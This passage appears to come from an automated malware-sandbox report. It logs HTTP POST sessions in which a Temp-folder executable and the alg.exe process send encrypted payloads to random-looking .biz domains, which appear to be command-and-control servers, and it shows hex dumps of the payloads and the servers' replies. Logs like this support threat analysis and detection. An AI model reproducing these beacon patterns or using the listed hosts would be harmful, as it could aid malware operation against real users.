                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:44.660553932 CET778OUTData Raw: b1 06 ec ba 42 85 1c 63 fe 02 00 00 c5 89 d4 8e 2f 0a b4 00 96 5c 2a 40 98 82 6b f9 0e b1 54 a1 15 44 e6 c2 ee 00 e6 3a f4 8a f7 25 8e 90 72 e2 90 3f f3 45 31 ac 93 6b 5c 7b a1 07 34 3a d0 5b ec da a5 c5 de ea 69 aa b5 06 3e 42 b3 4f fa 6e c8 18
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Bc/\*@kTD:%r?E1k\{4:[i>BOn{5JAUHu[)D(z)$J*&<ZoTc-i>O1AlqW>\0C(-d<zp;d`.A0~Dsh#wj&G~O
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:46.717103004 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:46 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=f0fa7bade7d8d7dba0de101d0f41aeaa|8.46.123.75|1732605346|1732605346|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    102192.168.2.105008585.214.228.140807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:46.278264046 CET353OUTPOST /fuqbdfcow HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:46.278384924 CET834OUTData Raw: 08 98 ee 0a cc f4 24 c7 36 03 00 00 4d 12 f0 b2 3c 62 a8 e8 cc bb 00 7d f5 45 d1 60 ed 57 df 80 54 b3 01 d6 66 c5 15 9e 12 38 96 cb c7 d1 55 1b 83 4c b2 2f fc 5c 48 72 82 96 1f de 3f 47 12 01 6c 8e b1 b9 d5 2e 7e d8 01 9a b1 74 3a b6 b0 ba ac 93
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: $6M<b}E`WTf8UL/\Hr?Gl.~t:s=d!Kdv40ZKJd2t`//f=qMv(Yv66oNVV)$J`>ka);ik:g5L*hC
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:47.713120937 CET176INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:47 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 19
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 404 page not found
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:47.720133066 CET351OUTPOST /tkvhoyj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:47.720369101 CET834OUTData Raw: 06 29 8a 7d 0c 15 0b 67 36 03 00 00 ca e9 7b 88 ee 2f a0 46 80 25 b8 c9 7e df d3 c1 dc dc 33 d8 e8 20 8a 3f b3 15 8b 39 47 aa 9d f4 5d c5 04 5f 0c 29 76 19 16 c5 df 6c 5b 1b 87 f8 83 e1 bd 9b 36 33 9c d7 0e bb 2b 32 6b 21 f2 01 4e 83 db 4f cc a7
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: )}g6{/F%~3 ?9G]_)vl[63+2k!NO+6G(>Lz7nL3Xe00@t1g!Q<FBXxpz\>+_39Oa==5p#O08AcuVoH2J9HS1u{ib7FC!d;>
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:48.275439024 CET176INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:48 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 19
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 404 page not found


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    103192.168.2.105008634.211.97.45806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:47.427215099 CET355OUTPOST /binfxyplqyoumy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:47.427236080 CET778OUTData Raw: 42 9d 4b 2f 28 00 24 e2 fe 02 00 00 ce 8d 38 7c 52 e9 43 1b d0 83 de 85 5e b9 86 b3 1b 25 51 17 e5 0d 11 7b 46 85 b5 62 31 63 3b f7 34 6b 95 88 ad f3 38 de 36 be c4 71 96 b2 1d 96 4b 1f 71 f3 98 c7 0c 36 78 26 de ae 24 1a 71 1b 7c 4e 5f a8 d7 ec
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: BK/($8|RC^%Q{Fb1c;4k86qKq6x&$q|N_r_RFzzADZiYNwQIDV)r|pSciL,F$lLk2)[;]p"H:=D?UXF@@AU
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:48.828164101 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:48 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=e386ef8cfd61ee2967da7a4b9855aeda|8.46.123.75|1732605348|1732605348|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    104192.168.2.105008747.129.31.212807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:48.548155069 CET352OUTPOST /dafungtde HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:48.548155069 CET834OUTData Raw: f8 5a 46 3a 66 39 6d b9 36 03 00 00 e3 dc 83 a8 52 c0 fa 0e c5 3f 35 02 86 5f b8 4c 4e 38 f6 9c f7 c9 21 83 55 8e 59 11 23 d7 f7 e1 cd 4d 99 9a 2a 3a 8b 6b b6 ac 37 2f d3 0c fe bf d4 e4 81 8d 03 da 35 06 fa 4d 1d 73 4a e0 66 65 16 f8 d1 e9 cc 3f
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ZF:f9m6R?5_LN8!UY#M*:k7/5MsJfe?aPM?LmL>5vC}{!aeUQGwatRQOkH}sBa),]iUEv&^xy](4ai>=*Xx@pw:v2:cp
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.606370926 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:50 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=88dae33b6ceb032154dbdb251c9a4d10|8.46.123.75|1732605350|1732605350|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    105192.168.2.105008847.129.31.212806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:49.526561975 CET343OUTPOST /c HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:49.526582003 CET778OUTData Raw: 40 a3 37 72 4c d0 fd 7a fe 02 00 00 2a ee 7c 78 10 d9 38 53 77 87 8b c4 41 51 d3 b8 ac 7f 13 0c 99 11 bb cd 2c fb 90 ba 85 cb 7b 29 b2 65 16 2a f1 3d 64 fc 65 cd 4d a3 6f 5c bc d4 28 bf c6 9f 06 86 a1 66 6e a1 9b 52 46 73 08 e9 a4 f6 9d 82 c0 08
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: @7rLz*|x8SwAQ,{)e*=deMo\(fnRFs?l1,\SFXdu*Qm,y5We3ojw "]+YnBQea d*Y</X`3p0BpSmGq["TvG+5M:C
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.540936947 CET408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:51 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=07df7664a301391ad103de4b6657bc91|8.46.123.75|1732605351|1732605351|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    106192.168.2.105009034.211.97.45807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.885222912 CET356OUTPOST /tgphsmbcvwmuwmj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.885222912 CET834OUTData Raw: 5e b7 84 84 79 29 1c 2b 36 03 00 00 a8 ad e0 c2 ed 85 37 be 43 81 e2 f3 65 f2 13 17 56 52 aa cb c3 14 10 de 57 2d 02 92 f0 73 09 c8 4d ed 48 5c 11 12 42 67 b3 97 2d 65 d7 5d 7c 05 78 4b 9c 7f 12 3b 94 cd f0 bd af a9 90 ea c3 6e a3 39 eb 4b a5 a2
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ^y)+67CeVRW-sMH\Bg-e]|xK;n9K7LS8l1yG*Ph-}dOt6nYztj=rhhrw|,hAGu#myf1BW,JLZN<hysH)6JwZ=bm_
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.335520029 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:52 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=7f1400c3965a41fabaded606d962fb4f|8.46.123.75|1732605352|1732605352|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    107192.168.2.105009118.208.156.248806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.246824980 CET356OUTPOST /nnsajrfcymu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: opowhhece.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.246824980 CET778OUTData Raw: 3a df 9f 07 cc b5 c0 f8 fe 02 00 00 f2 6e 93 ec b0 50 8f 9a fc 41 1b 09 16 41 0c 2a 90 b8 2d 3f bc 2f e1 c1 56 5e 00 2b b7 9b b9 57 86 54 bc fa 59 8f e0 5f e5 46 35 2c 53 78 5b 21 f0 52 5e ba 15 b9 ab 46 ec 2b 39 04 d0 57 14 f8 d1 bc 02 ac b0 58
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: :nPAA*-?/V^+WTY_F5,Sx[!R^F+9WXK*HJHB3WKNU%+S/Iffp0u=Y;k^Ifo`}B;f_8A9H&"@G\`|'FH^V~Nb3NCQL!:}.3w.Nr[
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:53.403686047 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:53 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=aed624f5e173802bc953e3f600562a3d|8.46.123.75|1732605353|1732605353|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    108192.168.2.105009347.129.31.212807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.616458893 CET353OUTPOST /dqxhnesyyna HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.616458893 CET834OUTData Raw: 6e 94 92 f9 8c b1 1b 03 36 03 00 00 8b ee 94 d7 3e c5 24 5c e5 15 8e a0 72 b4 29 51 e9 d9 17 2d e6 e3 d7 29 4e 49 a3 d6 7c 1e 26 33 99 66 9b bb 83 ef e9 5d 9d aa 96 fe 0a 6a 61 2c eb 0f 1e d7 d8 54 7b 8b 43 9e 72 f0 25 fc 0f 39 c4 fb fb 8c b1 62
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: n6>$\r)Q-)NI|&3f]ja,T{Cr%9b,P?1!iPWPBKpCGPc}kY`[eN_g8~M7!HIJf3t\`5!__1 `QU8D6EaTqgGCBf=
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:54.719578028 CET408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:54 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=ac84f816099316ed38fd8a1e09c0e0f5|8.46.123.75|1732605354|1732605354|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    109192.168.2.105009413.251.16.150806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:54.533704042 CET343OUTPOST /b HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:54.533704042 CET778OUTData Raw: d0 0c 45 be 12 4c ad 54 fe 02 00 00 ae 34 7a 94 07 a3 e2 a9 31 41 9e 74 d0 d5 df 77 8c 84 b8 ec ea 4b 41 50 a2 9c b3 bb 0e 69 7d 23 37 ef 45 a4 f6 8f 5c 3a 57 27 bf 8f 1f 40 dc 3f 52 d1 58 c3 57 db 01 ab d8 0d 52 6e 86 d9 eb ce 36 c1 c7 06 a8 04
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ELT4z1AtwKAPi}#7E\:W'@?RXWRn6?`,o%F?:{@9vINyg'{$zaez2[2l`eRV%br2B)Z[A6Lno&OA<ce*Ts%d.@
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:56.591789961 CET408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:56 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=e6c42f4f226f90362d49b9e6270e10ad|8.46.123.75|1732605356|1732605356|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    110192.168.2.105009518.208.156.248807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:54.989727020 CET355OUTPOST /ghhknbcvfb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: opowhhece.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:54.989727020 CET834OUTData Raw: 09 8a 4b 2e 3f 4e 12 e0 36 03 00 00 ca 25 7f 2b 1e f0 72 19 18 f7 52 6b 67 e3 48 b6 16 dc a1 a4 ef 42 2f 5d 09 10 48 cc e6 ad ca 81 af 0b 0e 5f 52 6f 58 66 60 3a a6 00 a2 c5 e2 37 75 63 14 02 5e 92 16 e9 7e f5 5d 4c 2d f4 9f c9 65 98 f1 e0 e5 66
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: K.?N6%+rRkgHB/]H_RoXf`:7uc^~]L-ef8 ]f{9 g}o]mt:t}6P&+25=[<[J/"=P94.2\`#1N-5SK|r[6/dSlb{gBH0*(Y4kjnx R/}kax#
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:56.141606092 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:55 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=f66ad5e354b13d18a6c7cc48ab1b4dfe|8.46.123.75|1732605355|1732605355|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
